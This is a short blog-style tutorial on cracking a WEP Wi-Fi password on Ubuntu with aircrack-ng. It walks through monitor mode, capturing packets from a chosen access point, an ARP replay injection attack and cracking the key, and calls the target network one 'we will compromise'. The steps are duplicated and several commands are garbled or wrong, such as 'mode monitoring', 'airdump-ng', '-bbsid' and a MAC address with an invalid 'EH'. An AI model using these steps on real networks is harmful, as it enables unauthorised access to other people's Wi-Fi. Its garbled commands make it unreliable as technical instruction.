How To Hack Wifi Passwords in Linux Ubuntu

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s
best passwords hacking tools for penetration testing
(1) install aircrack
sudo apt-get install aircrack-ng
For hacking passwords in ubuntu , first we have to install air crack program in operating system.
  • Install aircrack
Sudo apt-get install aircrack-ng
  • For rooting , type “su-“ and type your password.
  • Now write the commands in terminal mode:
#iwconfig wlan0 mode monitoring
Note: Do take notice if any kind of error occurs type “#iwconfig” in a terminal to check for your wireless.
Now scan for a wireless network which will include educational purpose. Now type commands:
#airdump-ng wlan0
(2) You need to go in root first. For this purpose type “su –“ and type your password.
(3) Now type following command in terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.
(4) After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
Code: # airodump-ng wlan0
(5)  Once you have created one, abort the process with shortcut key : Ctrl+C. Now there is a need to collect information about the network. Firstly, copy the MAC address of the access point which stands for BSSID (example: 00:11:EH:B8:…..). Another point to be noted is to know the channel and it’s current working. (example: currently working under CH-5). Now , hather information with airodump-ng. Write the following code:
#airodump-ng-w wep –c 5 –bbsid 00:11:EH:B8:….wlan0
6.)Now. Open another terminal to use ARP Reply Attack which increases the amount of data packets and gather the initializing vectors or IV of the chosen access points earlier. Write the following code:
#Aireplay-ng -3 –b  00:11:EH:B8:….wlan0
(7) Now again move back to the first terminal and have a look at the data packets. Nearabout 20000 packets have been  collected yet. If it is so, abort both airodump-ng and aireplay-ng. To decode the key of wireless network, we are provided with every information.  This all can be done with aircrack:
#aircrack-ng wep-03.cap

Post a Comment

Post Your Comments

Previous Post Next Post

Contact Form